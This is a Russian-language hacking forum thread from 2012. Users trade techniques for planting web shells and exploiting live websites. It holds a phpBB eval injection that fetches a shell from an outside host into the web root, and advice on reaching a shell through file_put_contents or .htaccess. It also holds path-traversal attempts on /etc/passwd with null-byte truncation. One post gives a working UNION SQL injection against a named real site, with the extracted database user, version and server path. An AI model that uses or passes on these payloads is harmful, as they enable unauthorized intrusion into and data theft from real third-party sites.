 |
|
28.01.2012, 10:36
|
|
Участник форума
Регистрация: 15.08.2010
Сообщений: 260
С нами:
8285366
Репутация:
62
|
|
Сообщение от Brain_Enable
Не работает. После того как скопировал, пробелы(которые форум добавляет) естественно убрал
Почему названия столбцов разделяются двоеточием, а не запятой?
Вы сами пробовали этот код?
товарисч, иди кури маны. тоже мне хацкир..
|
|
|
28.01.2012, 10:39
|
|
Участник форума
Регистрация: 15.08.2010
Сообщений: 260
С нами:
8285366
Репутация:
62
|
|
Сообщение от justonline
есть где почитать подробнее про заливку шела через картинку?
просто загнать шелл.пхп не получается..сначало резало js...потом я скрипт этот выпилил и теперь режет с серверной стороны.
переименовал шелл в шелл.пхп.жпг, получил в аватарку себе -
жду советов /thread312513.html
|
|
|
|
28.01.2012, 15:14
|
|
Постоянный
Регистрация: 17.09.2011
Сообщений: 390
С нами:
7712246
Репутация:
23
|
|
В такой ситуации как залить шелл, или это безнадежно?
Я, понимаю, здесь запрещен инклуд и форум пропатчен, или я не прав?
http://www.site.com/forum/profile.php?mode=editprofile&bb=copy($_GET[file1],$_GET[file2]);&file1=http://web.ru/shell.txt&file2=/home/data/www/public_html/forum/shell.php
Warning: copy() [function.copy]: URL file-access is disabled in the server configuration in /home/data/www/public_html/forum/includes/usercp_register.php(888) : regexp code(1) : eval()'d code on line 1
|
|
|
|
28.01.2012, 15:20
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
Сообщение от er9j6@
В такой ситуации как залить шелл, или это безнадежно?
Я, понимаю, здесь запрещен инклуд и форум пропатчен, или я не прав?
http://www.site.com/forum/profile.php?mode=editprofile&bb=copy($_GET[file1],$_GET[file2]);&file1=http://web.ru/shell.txt&file2=/home/data/www/public_html/forum/shell.php
Warning: copy() [function.copy]: URL file-access is disabled in the server configuration in /home/data/www/public_html/forum/includes/usercp_register.php(888) : regexp code(1) : eval()'d code on line 1
через file_put_contents залей форму upload а, дальше шелл..
|
|
|
|
29.01.2012, 12:13
|
|
Новичок
Регистрация: 16.01.2009
Сообщений: 17
С нами:
9114129
Репутация:
2
|
|
Как заливать шеллы, используя плохую настройку .htaccess?
|
|
|
|
29.01.2012, 12:31
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
Сообщение от ReckouNT
Как заливать шеллы, используя плохую настройку .htaccess?
А по точнее? Например, если льеш файл .php, а он через скрипт ренеймится в 4341843438121354131_file.php, можно полистать папки
Сообщение от None
используя плохую настройку .htaccess
|
|
|
|
29.01.2012, 18:33
|
|
Новичок
Регистрация: 09.01.2012
Сообщений: 21
С нами:
7548086
Репутация:
0
|
|
http://reshuege.ru/test?theme=2'))+and+(('1'='1 - возможно ли здесь стянуть что либо ? Просто параметр проходит через функцию int(), и поэтому результат не увидеть (
|
|
|
|
29.01.2012, 21:06
|
|
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами:
8063606
Репутация:
-1
|
|
такой вопрос, в пхп инъекции:
Warning: fopen(./books/chem/adams-r/1956-sbr-8/str/../../../../../../etc/passwd.str - это без нул байта
а вот это с нул байтом
Warning: fopen(./books/chem/adams-r/1956-sbr-8/str/../../../../../../etc/passwd\0.str)
вопрос как еще можно отрезать "0.str"?
|
|
|
|
29.01.2012, 21:07
|
|
Постоянный
Регистрация: 01.12.2011
Сообщений: 560
С нами:
7604246
Репутация:
267
|
|
2bodrich,
Код:
http://reshuege.ru/test?pid=25171-999999.9'))+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8--+f
Код:
root@localhost:problems:5.1.49-3
Full Path:
Код:
/var/www/reshuege.ru/
Вообщем можно много чего вытащить ^_^ Походу папка /psprav/
доступна на запись.
Сообщение от bodrich
http://reshuege.ru/test?theme=2'))+and+(('1'='1 - возможно ли здесь стянуть что либо ?
Просто параметр проходит через функцию int(), и поэтому результат не увидеть (
4096 слешей пробуй.
UPD. Нет(
|
|
|
|
29.01.2012, 21:24
|
|
Познающий
Регистрация: 16.01.2011
Сообщений: 71
С нами:
8063606
Репутация:
-1
|
|
2Ereee не канает, еще может какие то мысли?
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 95 (пользователей: 0 , гостей: 95)
|
|
|
|
Похожие темы
Линейный вид
